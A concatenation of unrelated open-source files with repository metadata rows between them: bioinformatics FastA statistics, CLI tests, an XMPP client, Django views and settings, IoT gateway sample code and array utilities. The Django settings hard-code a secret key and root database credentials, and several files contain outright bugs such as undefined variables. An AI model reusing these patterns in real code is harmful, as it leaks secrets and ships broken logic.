contigs = self.id2stats.keys()
contigi = len(contigs)
# filter by contig length
if minLength:
contigs = filter(lambda x: self.id2stats[x][0]>=minLength, self.id2stats)
# sort by descending size
sorted_contigs = sorted(contigs, key=lambda x: self.id2stats[x][0], reverse=reverse)
# filter longest contigs by genome fraction
if genomeFrac:
totsize = 0
for contigi, c in enumerate(sorted_contigs, 1):
totsize += self.id2stats[c][0]
if totsize >= genomeFrac*self.genomeSize:
break
return sorted_contigs[:contigi]
def get_N_and_L(self, genomeFrac=0.5, return_L=False, genomeSize=None):
"""Return N50 (and L50 if return_L) of given FastA.
- genomeFrac - calculate N (and L) for this fraction of genome [0.5 for N50 & L50]
- return NL - return N50 (contig size) and L50 (number of contigs) [False]
- genomeSize - if provided, it will use this size of the genome
instead of size of give assembly
"""
if not genomeSize:
genomeSize = self.genomeSize
# parse contigs by descending size
totsize = 0
for i, x in enumerate(sorted(self.id2stats.itervalues(), reverse=True), 1):
size = x[0]
totsize += size
if totsize >= genomeFrac*genomeSize:
break
# return N & L
if return_L:
return size, i
# return just N
return size
def N90(self):
"""Return N90"""
return self.get_N_and_L(0.9)
def L90(self):
"""Return N90"""
return self.get_N_and_L(0.9, return_L=True)[1]
def N50(self):
"""Return N90"""
return self.get_N_and_L()
def L50(self):
"""Return N90"""
return self.get_N_and_L(return_L=True)[1]
def GC(self):
"""Return GC and number of Ns"""
# catch errors ie. empty files
#if len(basecounts) != 4:
# return "%s\t[ERROR] Couldn't read file content\n"%handle.name
(A, C, G, T) = self.basecounts
GC = 100.0*(G + C) / sum(self.basecounts)
return GC
def stats(self):
"""Return FastA statistics aka fasta_stats"""
if not self.id2stats:
return "[WARNING] No entries found!\n"
longest = max(stats[0] for stats in self.id2stats.itervalues())
lengths1000 = [x[0] for x in self.id2stats.itervalues() if x[0]>=1000]
contigs1000 = len(lengths1000)
_line = '%s\t%s\t%s\t%.3f\t%s\t%s\t%s\t%s\t%s\t%s\n'
line = _line % (self.fasta, len(self), self.genomeSize, self.GC(), contigs1000, sum(lengths1000),
self.N50(), self.N90(), self.Ns, longest)
return line
def main():
import argparse
usage = "%(prog)s -i " #usage=usage,
parser = argparse.ArgumentParser(description=desc, epilog=epilog, \
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='0.11c')
parser.add_argument("-v", "--verbose", default=False, action="store_true",
help="verbose")
parser.add_argument("-i", "--fasta", type=file,
help="FASTA file(s)")
parser.add_argument("-o", "--out", default=sys.stdout, type=argparse.FileType('w'),
help="output stream [stdout]")
parser.add_argument("-r", "--regions", nargs='*', default=[],
help="contig(s) or contig region(s) to output (returns reverse complement if end larger than start)")
parser.add_argument("-N", default=0, type=int,
help="calculate NXX and exit ie N50")
parser.add_argument("-L", default=0, type=int,
help="calculate LXX and exit ie L50")
parser.add_argument("-S", "--stats", default=False, action="store_true",
help="return FastA stats aka fasta_stats")
o = parser.parse_args()
# print help if no parameters
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if o.verbose:
sys.stderr.write("Options: %s\n"%str(o))
# init faidx
faidx = FastaIndex(o.fasta, o.verbose)
# report N & L
if o.N:
o.out.write("%s\n"%faidx.get_N_and_L(o.N/100.))
if o.L:
o.out.write("%s\n"%faidx.get_N_and_L(o.L/100., return_L=True)[1])
# fasta_stats
if o.stats:
o.out.write(faidx.stats())
# report regions
for region in o.regions:
o.out.write(faidx.get_fasta(region))
if __name__=='__main__':
t0 = datetime.now()
try:
main()
except KeyboardInterrupt:
sys.stderr.write("\nCtrl-C pressed! \n")
except IOError as e:
sys.stderr.write("I/O error({0}): {1}\n".format(e.errno, e.strerror))
#[Errno 95] Operation not supported
except OSError:
sys.stderr.write("OS error({0}): {1}\n".format(e.errno, e.strerror))
dt = datetime.now()-t0
sys.stderr.write("#Time elapsed: %s\n"%dt)
| gpl-3.0 | 3,183,129,728,090,957,000 | 38.097087 | 125 | 0.532688 | false | 3.774783 | false | false | false |
dmtucker/ogre | ogre/test/test_cli.py | 1 | 1995 | # coding: utf-8
"""Tests for ogre.cli"""
from __future__ import absolute_import
import random
import pytest
import ogre.cli
@pytest.fixture
def source():
"""Return a valid source."""
return random.choice(['twitter'])
# pylint: disable=redefined-outer-name
def test___main__():
"""Test python -m functionality."""
with pytest.raises(SystemExit) as excinfo:
import ogre.__main__ # pylint: disable=redefined-outer-name, unused-variable
assert excinfo.value != 0
def test_empty():
"""Test invocation with no arguments."""
with pytest.raises(SystemExit) as excinfo:
ogre.cli.main()
assert excinfo.value != 0
def test_no_credentials(source):
"""Test an invocation without API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source])
assert excinfo.value != 0
def test_invalid_keys(source):
"""Test an invocation with invalid API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--keys', 'invalid'])
assert excinfo.value != 0
def test_invalid_location(source):
"""Test an invocation with an invalid location."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-l', '0', '0', 'invalid', 'km'])
assert excinfo.value != 0
def test_invalid_interval(source):
"""Test an invocation with an invalid interval."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-i', '0', 'invalid'])
assert excinfo.value != 0
def test_invalid_limit(source):
"""Test an invocation with an invalid limit."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--limit', 'invalid'])
assert excinfo.value != 0
def test_invalid_log(source):
"""Test an invocation with an invalid log."""
with pytest.raises(AttributeError) as excinfo:
ogre.cli.main(['-s', source, '--log', 'invalid'])
assert excinfo.value != 0
| lgpl-2.1 | -5,412,784,920,642,356,000 | 25.6 | 85 | 0.646617 | false | 3.814532 | true | false | false |
jonanone/APIProject | vagrant/rate_limit/tester.py | 1 | 1220 | from __future__ import division
from time import sleep
import httplib2
import json
h = httplib2.Http()
url = raw_input("Please enter the uri you want to access, \n"
"If left blank the connection will be set to "
"'http://localhost:5000/rate-limited': ")
if url == '':
url = 'http://localhost:5000/rate-limited'
req_per_minute = float(raw_input("Please specify the number "
"of requests per minute: "))
interval = (60.0 / req_per_minute)
def SendRequests(url, req_per_minute):
requests = 0
while requests < req_per_minute:
result = json.loads(h.request(url, 'GET')[1])
# result = h.request(url,'GET')[1]
# print result
if result.get('error') is not None:
print "Error #%s : %s" % (result.get('error'), result.get('data'))
print "Hit rate limit. Waiting 5 seconds and trying again..."
sleep(5)
SendRequests(url, req_per_minute)
else:
print "Number of Requests: ", requests+1
print result.get('response')
requests = requests + 1
sleep(interval)
print "Sending Requests..."
SendRequests(url, req_per_minute)
| mit | -2,319,813,114,321,841,700 | 30.282051 | 78 | 0.585246 | false | 3.8125 | false | false | false |
CuonDeveloper/cuon | cuon_client/Client/CUON/cuon/Chat/xmpp_client.py | 3 | 4029 | # -*- coding: utf-8 -*-
##Copyright (C) [2009] [Jürgen Hamel, D-32584 Löhne]
##This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as
##published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.
##This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
##warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
##for more details.
##You should have received a copy of the GNU General Public License along with this program; if not, write to the
##Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#from twisted.web import xmlrpc
import sys,os,string,threading,time,curses
from time import strftime
import xmlrpclib
from twisted.internet.protocol import Protocol
from twisted.words.protocols.jabber import client, jid, xmlstream
from twisted.words.xish import domish
from twisted.words.xish.domish import Element
from cuon.TypeDefs.constants import constants
import time
import shelve
class xmpp_client(constants):
def __init__(self, userjid, password):
constants.__init__(self)
self.filename = 'dic_jabberusers'
self.me = jid.JID(userjid)
self.juser = userjid
self.factory = client.basicClientFactory(self.me, password)
#self.Server = xmlrpclib.ServerProxy(self.XMLRPC_PROTO + '://' + self.XMLRPC_HOST + ':' + `self.XMLRPC_PORT`)
self.theXmlstream = None
self.dicUsers = {}
self.factory.addBootstrap('//event/stream/authd',self.authd)
# Authorized
def authd(self, xmlstream):
# need to send presence so clients know we're
# actually online.
print 'start authd'
presence = domish.Element(('jabber:client', 'presence'))
presence.addElement('status').addContent('Online')
self.theXmlstream = xmlstream
self.theXmlstream.send(presence)
self.theXmlstream.addObserver('/message', self.gotMessage)
print 'new xmlstream = ', self.theXmlstream
def create_reply(self, elem):
""" switch the 'to' and 'from' attributes to reply to this element """
# NOTE - see domish.Element class to view more methods
msg_frm = elem['from']
msg_to = elem['to']
message = domish.Element(('jabber:client','message'))
message["to"] = msg_frm
message["from"] = msg_to
message["type"] = "chat"
return message
def buildProtocol(self, addr):
print 'Connected.'
return Echo()
def send(self, to, body, subject=None, mtype=None, delay=None):
print 'start sending'
el = Element((None, "message"))
el.attributes["to"] = to
el.attributes["from"] = self.juser
el.attributes["id"] = '111111'
if(subject):
subj = el.addElement("subject")
subj.addContent(subject)
if(mtype):
el.attributes["type"] = mtype
if(delay):
x = el.addElement("x")
x.attributes["xmlns"] = "jabber:x:delay"
x.attributes["from"] = fro
x.attributes["stamp"] = delay
b = el.addElement("body")
b.addContent(body)
self.theXmlstream.send(el)
print 'done sending'
def gotMessage(self, message):
# sorry for the __str__(), makes unicode happy
print u"from1: %s" % message["from"]
send_from = message["from"].strip()
self.displayMessage(send_from, message)
def displayMessage(self, send_from, message):
password
def getTime(self):
return time.strftime(self.liTimes['hour24'],time.localtime())
| gpl-3.0 | -636,960,826,041,465,300 | 32.840336 | 126 | 0.610628 | false | 4.07179 | false | false | false |
aprefontaine/TMScheduler | userprefs/views.py | 1 | 2273 | from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.template import Context, loader
from google.appengine.api import users
from userprefs.models import *
from clubs.models import Club
import logging
def index(request):
user = users.get_current_user()
club = None
phone = ""
if not user:
auth_url = users.create_login_url(request.path + '/prefs')
else:
auth_url = users.create_logout_url(request.path)
userPrefs = get_userprefs(user.user_id())
logging.info('userPrefs index: get_userprefs returns %s' % userPrefs)
if userPrefs:
logging.info('userPrefs: %s' % (userPrefs,))
club = userPrefs.club
phone = userPrefs.phone
else:
# should we ever get here? We should always get a userPref but version of prefs may be 0.
logging.info('userPrefs: no record yet. Why here??')
clubList = Club.objects.all().order_by('Number')
t = loader.get_template('userprefs/index.html')
c = RequestContext(request, {
'user': user,
'auth_url': auth_url,
'club': club,
'phone': phone,
'clubList' : clubList
})
return HttpResponse(t.render(c))
def update(request):
try:
user = users.get_current_user()
clubNumber = request.POST['clubNumber']
phoneNumber = request.POST['phoneNumber']
except ():
#
return render_to_response('prefs/index.html', {
'error_message': "Prefs update failed.",
}, context_instance=RequestContext(request))
else:
logging.info('Save UserPrefs: club=['+clubNumber+'], phoneNumber=['+phoneNumber+'], gid=['+user.user_id()+']')
newUserPrefs = UserPrefs(version=1,club=clubNumber,phone=phoneNumber,googleOpenId=user.user_id())
newUserPrefs.save()
# messages.success(request, 'Add')
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('userprefs.views.index'))
# return HttpResponse('Test') | bsd-3-clause | -8,334,347,202,004,104,000 | 38.894737 | 118 | 0.646282 | false | 3.859083 | false | false | false |
mantidproject/mantid | scripts/Diffraction/isis_powder/hrpd_routines/hrpd_advanced_config.py | 3 | 2689 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
from isis_powder.hrpd_routines.hrpd_enums import HRPD_TOF_WINDOWS
# Default cylindrical sample geometry and material used for absorption
# corrections. The chemical formula "V" matches a vanadium calibration run;
# assumes height/radius are in cm and position is the sample centre offset
# -- TODO confirm units against the Mantid absorption-correction docs.
absorption_correction_params = {
    "cylinder_sample_height": 2.0,
    "cylinder_sample_radius": 0.3,
    "cylinder_position": [0., 0., 0.],
    "chemical_formula": "V"
}
# Per-TOF-window cropping settings. Each dict supplies the fractional crop
# applied to the vanadium run and to the focused data; all windows currently
# use the same default of trimming 5% off each end of the spectrum.
# The dict chosen at runtime is selected by get_tof_window_dict().

# Default cropping values are 5% off each end

# 10-50 ms time-of-flight window
window_10_50_params = {
    "vanadium_tof_cropping": (0.05, 0.95),
    "focused_cropping_values": (0.05, 0.95)
}

# 10-110 ms time-of-flight window (the default in get_all_adv_variables)
window_10_110_params = {
    "vanadium_tof_cropping": (0.05, 0.95),
    "focused_cropping_values": (0.05, 0.95)
}

# 30-130 ms time-of-flight window
window_30_130_params = {
    "vanadium_tof_cropping": (0.05, 0.95),
    "focused_cropping_values": (0.05, 0.95)
}

# 100-200 ms time-of-flight window
window_100_200_params = {
    "vanadium_tof_cropping": (0.05, 0.95),
    "focused_cropping_values": (0.05, 0.95)
}

# 180-280 ms time-of-flight window
window_180_280_params = {
    "vanadium_tof_cropping": (0.05, 0.95),
    "focused_cropping_values": (0.05, 0.95)
}
# Instrument file names and output-filename templates. Templates contain
# placeholders ({instlow}, {runno}, ...) substituted later by the common
# output code; the doubled braces ({{bankno}}) survive the first .format()
# pass so the bank number can be filled in per-bank afterwards.
file_names = {
    "vanadium_peaks_masking_file": "VanaPeaks.dat",
    "grouping_file_name": "hrpd_new_072_01_corr.cal",
    "nxs_filename": "{instlow}{runno}{_fileext}{suffix}.nxs",
    "gss_filename": "{instlow}{runno}{_fileext}{suffix}.gss",
    "dat_files_directory": "dat_files",
    "tof_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_TOF.dat",
    "dspacing_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_D.dat",
}

# General focusing parameters: spline coefficient for the vanadium
# smoothing and one (negative => logarithmic) bin width per bank.
general_params = {
    "spline_coefficient": 70,
    "focused_bin_widths": [
        -0.0003,  # Bank 1
        -0.0007,  # Bank 2
        -0.0012  # Bank 3
    ],
    "mode": "coupled"
}
def get_all_adv_variables(tof_window=HRPD_TOF_WINDOWS.window_10_110):
    """Return the merged advanced-configuration dictionary for HRPD.

    Combines the file-name templates, the general focusing parameters and
    the cropping settings for the requested time-of-flight window. Later
    sources overwrite earlier ones on key collision (file names, then
    general params, then the window-specific values).
    """
    combined = dict(file_names)
    combined.update(general_params)
    combined.update(get_tof_window_dict(tof_window=tof_window))
    return combined
def get_tof_window_dict(tof_window):
    """Return the cropping-parameter dict for the given TOF window.

    Raises RuntimeError if ``tof_window`` does not match any of the known
    HRPD_TOF_WINDOWS values.
    """
    # Ordered (window, params) pairs; compared with == to mirror the
    # original if-chain semantics rather than relying on hashing.
    known_windows = (
        (HRPD_TOF_WINDOWS.window_10_50, window_10_50_params),
        (HRPD_TOF_WINDOWS.window_10_110, window_10_110_params),
        (HRPD_TOF_WINDOWS.window_30_130, window_30_130_params),
        (HRPD_TOF_WINDOWS.window_100_200, window_100_200_params),
        (HRPD_TOF_WINDOWS.window_180_280, window_180_280_params),
    )
    for window, params in known_windows:
        if tof_window == window:
            return params
    raise RuntimeError("Invalid time-of-flight window: {}".format(tof_window))
| gpl-3.0 | -1,890,241,532,106,708,500 | 31.39759 | 84 | 0.656006 | false | 2.716162 | false | false | false |
garaud/ezhc | ezhc/sample.py | 1 | 2116 |
import os
import numpy as np
import pandas as pd
from _config import SAMPLES_DIR, DF_ONE_IDX_SEVERAL_COL, DF_ONE_IDX_SEVERAL_COL_2, \
DF_ONE_IDX_ONE_COL, DF_ONE_IDX_TWO_COL, DF_TWO_IDX_ONE_COL, DF_SCATTER, \
DF_BUBBLE, DF_HEATMAP, DF_SEVERAL_IDX_ONE_COL
def load_df(src):
_dir = os.path.dirname(__file__)
df_file = os.path.join(_dir, SAMPLES_DIR, src)
df = pd.read_csv(df_file)
return df
def df_timeseries(N=3, Nb_bd=100, seed=123456):
np.random.seed(seed)
rate = 0.02
vol = 0.25
dt = 1.0/260
tracks = np.zeros([Nb_bd, N], dtype=np.float)
for k in range(N):
ln_returns = (rate-vol**2/2)*dt+vol*np.sqrt(dt)*np.random.normal(size=Nb_bd)
ln_returns[0] = 0.0
tracks[:, k] = np.exp(ln_returns).cumprod()
dates = pd.date_range(start=pd.datetime(2015, 1, 1), periods=Nb_bd, freq='B')
df = pd.DataFrame(data=tracks, index=dates, columns=['Track'+str(1+i) for i in range(N)])
return df
def df_one_idx_several_col():
df = load_df(DF_ONE_IDX_SEVERAL_COL)
df = df.set_index('Fruit')
return df
def df_one_idx_several_col_2():
df = load_df(DF_ONE_IDX_SEVERAL_COL_2)
df = df.set_index('WeekDay')
return df
def df_one_idx_one_col():
df = load_df(DF_ONE_IDX_ONE_COL)
df = df.set_index('Brand')
return df
def df_one_idx_two_col():
df = load_df(DF_ONE_IDX_TWO_COL)
df = df.set_index('Month')
return df
def df_two_idx_one_col():
df = load_df(DF_TWO_IDX_ONE_COL)
df = df.set_index(['Brand', 'Version'])
return df
def df_scatter():
df = load_df(DF_SCATTER)
df = df.set_index(['Height', 'Weight'])
return df
def df_bubble():
df = load_df(DF_BUBBLE)
df = df.set_index(['Cat', 'x', 'y'])
return df
def df_heatmap():
df = load_df(DF_HEATMAP)
df = df.set_index(['Name', 'Day'])
return df
def df_several_idx_one_col():
df = load_df(DF_SEVERAL_IDX_ONE_COL)
df = df.set_index(['Region', 'Country', 'Cause'])
df = df.sortlevel()
return df
| mit | -2,835,475,829,766,355,500 | 21.752688 | 109 | 0.576087 | false | 2.602706 | false | false | false |
FilipeMaia/afnumpy | afnumpy/core/multiarray.py | 1 | 4723 | import numpy
import afnumpy
import arrayfire
from .. import private_utils as pu
from ..decorators import *
def fromstring(string, dtype=float, count=-1, sep=''):
return array(numpy.fromstring(string, dtype, count, sep))
def array(object, dtype=None, copy=True, order=None, subok=False, ndmin=0):
# We're going to ignore this for now
# if(subok is not False):
# raise NotImplementedError
if(order is not None and order is not 'K' and order is not 'C'):
raise NotImplementedError
# If it's not a numpy or afnumpy array first create a numpy array from it
if(not isinstance(object, afnumpy.ndarray) and
not isinstance(object, numpy.ndarray) and
not isinstance(object, arrayfire.array.Array)):
object = numpy.array(object, dtype=dtype, copy=copy, order=order, subok=subok, ndmin=ndmin)
if isinstance(object, arrayfire.array.Array):
shape = pu.c2f(object.dims())
else:
shape = object.shape
while(ndmin > len(shape)):
shape = (1,)+shape
if(dtype is None):
if isinstance(object, arrayfire.array.Array):
dtype = pu.typemap(object.dtype())
else:
dtype = object.dtype
if(isinstance(object, afnumpy.ndarray)):
if(copy):
s = arrayfire.cast(object.d_array.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object.d_array, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, arrayfire.array.Array)):
if(copy):
s = arrayfire.cast(object.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, numpy.ndarray)):
return afnumpy.ndarray(shape, dtype=dtype, buffer=numpy.ascontiguousarray(object.astype(dtype, copy=copy)))
else:
raise AssertionError
def arange(start, stop = None, step = None, dtype=None):
return afnumpy.array(numpy.arange(start,stop,step,dtype))
def empty(shape, dtype=float, order='C'):
return afnumpy.ndarray(shape, dtype=dtype, order=order)
def zeros(shape, dtype=float, order='C'):
b = numpy.zeros(shape, dtype, order)
return afnumpy.ndarray(b.shape, b.dtype, buffer=b,order=order)
def where(condition, x=pu.dummy, y=pu.dummy):
a = condition
s = arrayfire.where(a.d_array)
# numpy uses int64 while arrayfire uses uint32
s = afnumpy.ndarray(pu.af_shape(s), dtype=numpy.uint32, af_array=s).astype(numpy.int64)
# Looks like where goes through the JIT??
s.eval()
if(x is pu.dummy and y is pu.dummy):
idx = []
mult = 1
for i in a.shape[::-1]:
mult = i
idx = [s % mult] + idx
s //= mult
idx = tuple(idx)
return idx
elif(x is not pu.dummy and y is not pu.dummy):
if(x.dtype != y.dtype):
raise TypeError('x and y must have same dtype')
if(x.shape != y.shape):
raise ValueError('x and y must have same shape')
ret = afnumpy.array(y)
if(len(ret.shape) > 1):
ret = ret.flatten()
ret[s] = x.flatten()[s]
ret = ret.reshape(x.shape)
else:
ret[s] = x[s]
return ret;
else:
raise ValueError('either both or neither of x and y should be given')
def concatenate(arrays, axis=0):
arrays = tuple(arrays)
if len(arrays) == 0:
raise ValueError('need at least one array to concatenate')
base = arrays[0]
if len(arrays) == 1:
return base.copy()
# arrayfire accepts at most 4 arrays to concatenate at once so we'll have
# to chunk the arrays
# The first case is special as we don't want to create unnecessary copies
i = 0
a = arrays[i].d_array
if i+1 < len(arrays):
b = arrays[i+1].d_array
else:
b = None
if i+2 < len(arrays):
c = arrays[i+2].d_array
else:
c = None
if i+3 < len(arrays):
d = arrays[i+3].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
for i in range(4,len(arrays),4):
a = ret.d_array
if i < len(arrays):
b = arrays[i].d_array
else:
b = None
if i+1 < len(arrays):
c = arrays[i+1].d_array
else:
c = None
if i+2 < len(arrays):
d = arrays[i+2].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
return ret
| bsd-2-clause | 26,260,496,238,726,344 | 32.496454 | 115 | 0.583739 | false | 3.45754 | false | false | false |
Lokesh-K-Haralakatta/iot-python | samples/managedGateway/simpleManagedGateway.py | 1 | 3793 | # *****************************************************************************
# Copyright (c) 2016 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Amit M Mangalvedkar - Initial Contribution
# *****************************************************************************
import getopt
import time
import sys
import psutil
import platform
import json
import signal
import subprocess
from uuid import getnode as get_mac
try:
import ibmiotf.gateway
except ImportError:
# This part is only required to run the sample from within the samples
# directory when the module itself is not installed.
#
# If you have the module installed, just use "import ibmiotf"
import os
import inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../../src")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import ibmiotf.gateway
def interruptHandler(signal, frame):
    """SIGINT handler: disconnect the module-global gateway `client` and exit.

    Note: the `signal` parameter shadows the `signal` module inside this
    function; both parameters are unused (required by the handler signature).
    """
    client.disconnect()
    sys.exit(0)
def commandProcessor(cmd):
    """Callback invoked for each command received from the IoT platform.

    Echoes the command payload (``cmd.data``) to stdout.
    """
    payload = cmd.data
    print("Command received: %s" % payload)
if __name__ == "__main__":
    # Disconnect cleanly on Ctrl+C.
    signal.signal(signal.SIGINT, interruptHandler)
    # Placeholder credentials -- replace with real organization/type/id/token.
    organization = "org_id"
    gatewayType = "MY GATEWAY TYPE"
    gatewayId = "MY GATEWAY ID"
    gatewayName = platform.node()
    authMethod = "token"
    authToken = "MASKED PASSWORD"
    configFilePath = None
    # Seconds to sleep so as to check the error state
    interval = 20
    client = None
    # Describe this gateway to the Device Management server using local
    # platform information.
    simpleGatewayInfo = ibmiotf.gateway.DeviceInfo()
    simpleGatewayInfo.description = gatewayName
    simpleGatewayInfo.deviceClass = platform.machine()
    simpleGatewayInfo.manufacturer = platform.system()
    simpleGatewayInfo.fwVersion = platform.version()
    simpleGatewayInfo.hwVersion = None
    simpleGatewayInfo.model = None
    simpleGatewayInfo.serialNumber = None
    options = {"org": organization, "type": gatewayType, "id": gatewayId, "auth-method": authMethod, "auth-token": authToken}
    try:
        # By default the client is an unmanaged client and on disconnecting
        # it again becomes unmanaged.
        # That's why we need to make it a managed gateway.
        client = ibmiotf.gateway.ManagedGateway(options, logHandlers=None, deviceInfo=simpleGatewayInfo)
        client.commandCallback = commandProcessor
        client.connect()
        # manage() method sends request to DM server to make the device a managed device
        client.manage(3600, supportDeviceActions=True, supportFirmwareActions=True).wait()
    except ibmiotf.ConfigurationException as e:
        print(str(e))
        sys.exit()
    except ibmiotf.UnsupportedAuthenticationMethod as e:
        print(str(e))
        sys.exit()
    except ibmiotf.ConnectionException as e:
        print(str(e))
        sys.exit()
    # Initiate DM action to update the geo location of the device, but don't wait (async) for it to complete
    client.setLocation(longitude=85, latitude=85, accuracy=100)
    print("Location has been set")
    # Make a GET call to https://orgid.internetofthings.ibmcloud.com/api/v0002/device/types/{gateway type}/devices/{gateway id}/location to test
    # Initiate DM action to set error codes to 1, wait for it to be completed (sync) and then clear all error codes
    client.setErrorCode(1).wait(10)
    print("Error code setting returned back")
    time.sleep(interval)
    client.clearErrorCodes()
    client.disconnect()
    print("(Press Ctrl+C to disconnect)")
dumoulinj/ers | ers_backend/ers_backend/settings.py | 1 | 4824 | """
Django settings for project ers_backend.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Root of the repository (two levels up from this settings module).
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# NOTE(review): os.path.dirname(__name__) takes the dirname of the module
# *name* string (not a file path), so this resolves relative to the current
# working directory -- probably meant __file__; confirm before changing.
PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): hard-coded secret key committed to the repository; rotate it
# and load it from the environment before any production deployment.
SECRET_KEY = 'ul2)0@*k-3snu(fijr8)9t1ozwuk3&4wmp_l=uikt426boodl@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # REST API
    'rest_framework',
    'rest_framework_swagger',
    'corsheaders',
    # Tests
    'testing',
    'model_mommy',
    # Websockets
    'swampdragon',
    # Help
    'annoying',
    # Apps
    'dataset_manager',
    'video_processor',
    'arousal_modeler',
    'timeframe_annotator',
    'emotion_annotator'
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ers_backend.urls'
WSGI_APPLICATION = 'ers_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Logging: colored console output at DEBUG level for the project apps.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            '()': 'djangocolors_formatter.DjangoColorsFormatter',
            'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
        },
        'simple': {
            '()': 'djangocolors_formatter.DjangoColorsFormatter',
            'format': '%(levelname)s %(message)s'
        },
    },
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'console':{
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        }
    },
    'loggers': {
        'dataset_manager': {
            'handlers': ['console'],
            'propagate': False,
            'level': 'DEBUG',
        },
        'video_processor': {
            'handlers': ['console'],
            'propagate': False,
            'level': 'DEBUG',
        },
        'ers_backend': {
            'handlers': ['console'],
            'propagate': False,
            'level': 'DEBUG',
        }
    }
}
# REST
# NOTE(review): missing trailing comma -- this is a plain string, not a
# 1-tuple, so iterating the whitelist yields individual characters; verify
# the intended format against django-cors-headers documentation.
CORS_ORIGIN_WHITELIST = (
    'http://localhost:3333'
)
CORS_ALLOW_HEADERS = (
    'x-requested-with',
    'content-type',
    'accept',
    'origin',
    'authorization',
    'X-CSRFToken'
)
CORS_ALLOW_CREDENTIALS = True
REST_FRAMEWORK = {
    'UNICODE_JSON': False,
}
# Swampdragon (websocket) connection class and endpoint.
SWAMP_DRAGON_CONNECTION = ('swampdragon.connections.sockjs_connection.DjangoSubscriberConnection', '/data')
DRAGON_URL = 'http://localhost:9999/'
# Celery
USE_CELERY = True
BROKER_URL = 'redis://localhost:6379/1'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'ers_backend_db',
        'USER': 'root',
        'PASSWORD': 'root',
        'HOST': '', # If mamp under OS X: /Applications/MAMP/tmp/mysql/mysql.sock
        'PORT': '',
    }
}
# Modify PATH if under OS X to have access to libraries such as ffmpeg
#os.environ["PATH"] += os.pathsep + os.pathsep.join(["/opt/local/bin", "/usr/local/bin"])
# Constants
VIDEO_EXTENSIONS = ("avi", "mkv", "mov", "mp4", "m4v", "mpeg", "mpg", "wmv")
